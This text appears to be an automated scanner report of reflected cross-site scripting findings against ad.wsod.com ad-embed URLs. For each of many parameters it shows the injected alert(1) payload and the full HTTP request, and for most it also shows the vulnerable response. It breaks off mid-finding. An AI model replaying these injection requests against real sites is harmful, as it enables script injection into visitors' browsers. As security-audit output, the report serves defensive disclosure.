HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:30 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31049"-alert(1)-"aab598a9703 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=823120831049"-alert(1)-"aab598a9703&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:08 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2a8a"-alert(1)-"d8d13c332e8 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=Ge2a8a"-alert(1)-"d8d13c332e8&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:03 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b9ef"-alert(1)-"fca189d9ed0 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!4b9ef"-alert(1)-"fca189d9ed0&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:36:54 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
5.63. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7da8c"-alert(1)-"7e28ca43465 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74&7da8c"-alert(1)-"7e28ca43465=1 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:25 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1684
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2c33'-alert(1)-'0a2fa29519b was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898e2c33'-alert(1)-'0a2fa29519b&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:05 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:05 GMT; path=/ Set-Cookie: i_1=33:353:198:141:0:40771:1303843025:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:05 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 917
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898e2c33'-alert(1)-'0a2fa29519b&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } ...[SNIP]...
The value of the 10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9758b'-alert(1)-'3377d1f28de was submitted in the 10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!9758b'-alert(1)-'3377d1f28de&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:01 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:01 GMT; path=/ Set-Cookie: i_1=33:353:198:141:0:40771:1303843021:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:01 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 917
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!9758b'-alert(1)-'3377d1f28de&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; re ...[SNIP]...
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d8f8'-alert(1)-'9db56fcbc1b was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=17974586289d8f8'-alert(1)-'9db56fcbc1b&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:19 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:19 GMT; path=/ Set-Cookie: i_1=33:353:198:141:0:40771:1303843039:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:19 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 917
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=17974586289d8f8'-alert(1)-'9db56fcbc1b&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image353() { docume ...[SNIP]...
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc220'-alert(1)-'63411dca46a was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3cc220'-alert(1)-'63411dca46a HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:34 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:34 GMT; path=/ Set-Cookie: i_1=33:353:198:141:0:40771:1303843054:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:34 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 917
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3cc220'-alert(1)-'63411dca46a'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image353() { document.write('<a href="//ad.wsod.com/click/8bec9b108 ...[SNIP]...
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88997'-alert(1)-'ecbfd9fe416 was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ88997'-alert(1)-'ecbfd9fe416&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:29 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:29 GMT; path=/ Set-Cookie: i_1=33:353:198:141:0:40771:1303843049:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:29 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 917
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ88997'-alert(1)-'ecbfd9fe416&ASID=5a9d1d95557d4344b789fe7d2c3b33e3'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image353() { document.write(' ...[SNIP]...
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2df16'-alert(1)-'6ca3ac2d5fd was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=282534882df16'-alert(1)-'6ca3ac2d5fd&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:14 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:14 GMT; path=/ Set-Cookie: i_1=33:353:198:141:0:40771:1303843034:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:14 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 917
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=282534882df16'-alert(1)-'6ca3ac2d5fd&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image35 ...[SNIP]...
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2e9f'-alert(1)-'f8feea60c6c was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=Ga2e9f'-alert(1)-'f8feea60c6c&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:10 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:10 GMT; path=/ Set-Cookie: i_1=33:353:198:141:0:40771:1303843030:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:10 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 917
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=Ga2e9f'-alert(1)-'f8feea60c6c&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } fun ...[SNIP]...
5.71. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959** [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload baa4c'-alert(1)-'46b9da792e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3&baa4c'-alert(1)-'46b9da792e5=1 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:38 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:38 GMT; path=/ Set-Cookie: i_1=33:353:198:141:0:40771:1303843058:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:38 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 920
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3&baa4c'-alert(1)-'46b9da792e5=1'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image353() { document.write('<a href="//ad.wsod.com/click/8bec9b1 ...[SNIP]...
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b088d'-alert(1)-'3a36277583e was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898b088d'-alert(1)-'3a36277583e&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:41:29 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:41:29 GMT; path=/ Set-Cookie: i_1=33:353:198:141:0:45001:1303843289:L|33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2; expires=Thu, 26-May-2011 18:41:29 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 858
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898b088d'-alert(1)-'3a36277583e&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } ...[SNIP]...
The value of the 10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5eff5'-alert(1)-'4670c7c8014 was submitted in the 10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
